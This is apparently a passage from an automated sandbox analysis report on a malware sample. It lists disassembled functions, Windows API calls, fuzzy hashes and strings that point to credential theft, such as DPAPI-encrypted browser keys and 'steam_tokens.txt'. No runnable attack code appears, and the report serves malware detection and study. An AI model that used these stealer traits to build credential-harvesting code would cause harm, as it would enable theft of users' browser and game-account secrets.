                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocLocallstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2746078483-738592651
                                • Opcode ID: 17e1f7dff4650e3df427e1412678bf0896f1bff6d7b2d6e3fcb355d6a755803f
                                • Instruction ID: 37226eccd243dc54ff3279ef1e7d09505e5a470f9f7659f35db1d1428776b172
                                • Opcode Fuzzy Hash: 17e1f7dff4650e3df427e1412678bf0896f1bff6d7b2d6e3fcb355d6a755803f
                                • Instruction Fuzzy Hash: A0415C71E002099BDB21EF64F8856AFB7F4AF94358F446568FE25BB253DA30AD04C790
                                Function 00E5E9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E5EA24
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5EA53
                                • lstrcat.KERNEL32(?,00000000), ref: 00E5EA61
                                • lstrcat.KERNEL32(?,00E71794), ref: 00E5EA7A
                                • lstrcat.KERNEL32(?,016C8978), ref: 00E5EA8D
                                • lstrcat.KERNEL32(?,00E71794), ref: 00E5EA9F
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 70493ae90ad83093360c1b188eef83fdf3d039db59945002b0cc07804335bd6a
                                • Instruction ID: efdafff6a1e988f0df60967b5b0d16d296b50d90dbcbeed1f37cebbf99e9cf9a
                                • Opcode Fuzzy Hash: 70493ae90ad83093360c1b188eef83fdf3d039db59945002b0cc07804335bd6a
                                • Instruction Fuzzy Hash: FB41A571D10118AFCB25EB64EC46EED33B4BF48300F4054A9BA5AB7345DA749E448BA0
                                Function 00E5ECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5ECDF
                                • lstrlen.KERNEL32(00000000), ref: 00E5ECF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5ED1D
                                • lstrlen.KERNEL32(00000000), ref: 00E5ED24
                                • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 00E5ED52
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: steam_tokens.txt
                                • API String ID: 367037083-401951677
                                • Opcode ID: d46eab4c9542ac57e595c9edbaf3dbd5fdc3d2e868afa59cdc9dccc3d17cd2dc
                                • Instruction ID: 68552d85a8d983ad65357295c6f7758c3d26bac3bc2a32146b661d9c3207400a
                                • Opcode Fuzzy Hash: d46eab4c9542ac57e595c9edbaf3dbd5fdc3d2e868afa59cdc9dccc3d17cd2dc
                                • Instruction Fuzzy Hash: 68317A31A102446BC722BF78F84A96E7BE8AF44315F446428FE46FB302DB24DD0987E1
                                Function 00E49A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00E4140E), ref: 00E49A9A
                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00E4140E), ref: 00E49AB0
                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,00E4140E), ref: 00E49AC7
                                • ReadFile.KERNEL32(00000000,00000000,?,00E4140E,00000000,?,?,?,00E4140E), ref: 00E49AE0
                                • LocalFree.KERNEL32(?,?,?,?,00E4140E), ref: 00E49B00
                                • CloseHandle.KERNEL32(00000000,?,?,?,00E4140E), ref: 00E49B07
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: fee702d4b85282460d91b0163908cbd84f73b31db8840b6de7e308aee36c0288
                                • Instruction ID: 8c32083a94cbd84f054055feaf992f3a1a100e568e81e3594f887c4ce542914e
                                • Opcode Fuzzy Hash: fee702d4b85282460d91b0163908cbd84f73b31db8840b6de7e308aee36c0288
                                • Instruction Fuzzy Hash: 0E115E71A00209AFE721DEA8EC88EAB737CEB04358F104259F905B6285EB759D10CBA5
                                Function 00E65AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E65B14
                                  • Part of subcall function 00E6A173: std::exception::exception.LIBCMT ref: 00E6A188
                                  • Part of subcall function 00E6A173: std::exception::exception.LIBCMT ref: 00E6A1AE
                                • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00E65B7C
                                • memmove.MSVCRT(00000000,?,?), ref: 00E65B89
                                • memmove.MSVCRT(00000000,?,?), ref: 00E65B98
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long
                                • API String ID: 2052693487-3788999226
                                • Opcode ID: 5fc6b6d9b100ec07d5b33425d22dfd0600843dcce5f78b8ab8faa2b0baf25205
                                • Instruction ID: 73c6dd89adccca089f58519110c9e5d2468be902659b4ad544527972e7ffeaeb
                                • Opcode Fuzzy Hash: 5fc6b6d9b100ec07d5b33425d22dfd0600843dcce5f78b8ab8faa2b0baf25205
                                • Instruction Fuzzy Hash: 3F415F72B406199FCF18DF6CD995AAEBBF5EB88350F148229E919E7384D630DD01CB90
                                Function 00E57D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E57D58
                                  • Part of subcall function 00E6A1C0: std::exception::exception.LIBCMT ref: 00E6A1D5
                                  • Part of subcall function 00E6A1C0: std::exception::exception.LIBCMT ref: 00E6A1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E57D76
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E57D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                • String ID: invalid string position$string too long
                                • API String ID: 3310641104-4289949731
                                • Opcode ID: 10c4f10dcfd2ef54cd0d448cfd0739fa2758e1ff777019c0256085f68fd33645
                                • Instruction ID: 4bbe22712cd444e0276124ac95daab830f83b2d4b12f4d3c70fc274838b5fdf3
                                • Opcode Fuzzy Hash: 10c4f10dcfd2ef54cd0d448cfd0739fa2758e1ff777019c0256085f68fd33645
                                • Instruction Fuzzy Hash: 6021D2323043004BD7209E6CF881A3AF7E5EF92755B245E6EE886AB281D771DC1887A1
                                Function 00E633C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E633EF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E633F6
                                • GlobalMemoryStatusEx.KERNEL32 ref: 00E63411
                                • wsprintfA.USER32 ref: 00E63437
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB
                                • API String ID: 2922868504-2651807785
                                • Opcode ID: 18fd72d821c827dc8bc52625088f02074eefacfac7fd6252c9f8fd397a92d0c7
                                • Instruction ID: d97a1e34a393e2bd86edf5b6134db27c3cbf98dc77e88de04d87bdfcf7f9ba4b
                                • Opcode Fuzzy Hash: 18fd72d821c827dc8bc52625088f02074eefacfac7fd6252c9f8fd397a92d0c7
                                • Instruction Fuzzy Hash: 6001B5B1E44218AFDB24DFA8DD49BAEB7B8FB44760F004129FA16F7380D779590087A1
                                Function 00E6926D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit$__getptdfree
                                • String ID: Xu$Xu
                                • API String ID: 2640026729-2934775391
                                • Opcode ID: 8430d1b692ab58eac5c6a94ceb39a7ab1fa9893e3be864b1c3b21fd007015453
                                • Instruction ID: 4212b2fc3f4f24e130987c19d0d86270345120130b22cc1ededee17e69d59b4c
                                • Opcode Fuzzy Hash: 8430d1b692ab58eac5c6a94ceb39a7ab1fa9893e3be864b1c3b21fd007015453
                                • Instruction Fuzzy Hash: B801D632DC6721ABDB14EB29B40579E73E47F00798F153019E448776A2CB306D81DBD5
                                Function 00E5D7B0 Relevance: 7.6, APIs: 5, Instructions: 127registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,016CDD90,00000000,00020119,?), ref: 00E5D7F5
                                • RegQueryValueExA.ADVAPI32(?,016CED50,00000000,00000000,00000000,000000FF), ref: 00E5D819
                                • RegCloseKey.ADVAPI32(?), ref: 00E5D823
                                • lstrcat.KERNEL32(?,00000000), ref: 00E5D848
                                • lstrcat.KERNEL32(?,016CEDB0), ref: 00E5D85C
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: 5e536baa3c0a2b73edc9c5cf9d0bf37f327c61c1d77e503d315be38262ddf30e
                                • Instruction ID: 8453fd4acd4450f51ad497177b9dff5b3489c833169f7e694185d3b13337c498
                                • Opcode Fuzzy Hash: 5e536baa3c0a2b73edc9c5cf9d0bf37f327c61c1d77e503d315be38262ddf30e
                                • Instruction Fuzzy Hash: 48417271A1010C9FCB64EF64FC86FDE77B8AB44304F409065BA49B7241EA35AA89CFD1
                                Function 00E57EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 00E57F31
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E57F60
                                • StrCmpCA.SHLWAPI(00000000,00E74C3C), ref: 00E57FA5
                                • StrCmpCA.SHLWAPI(00000000,00E74C3C), ref: 00E57FD3
                                • StrCmpCA.SHLWAPI(00000000,00E74C3C), ref: 00E58007
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 19d6db8f8f4580078332a5f3f88cb67919a8c1bab27b90c92aff182504b3fa4f
                                • Instruction ID: ba575343b8d02286b7a15c8e2cb888eb198f1ae66ced68193c2b8769b01ccebd
                                • Opcode Fuzzy Hash: 19d6db8f8f4580078332a5f3f88cb67919a8c1bab27b90c92aff182504b3fa4f
                                • Instruction Fuzzy Hash: 8F41C030A0810ADFCB20DF68E480E9EB7B4FF54305B115599E846FB341DB31AA69CBA1
                                Function 00E58050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
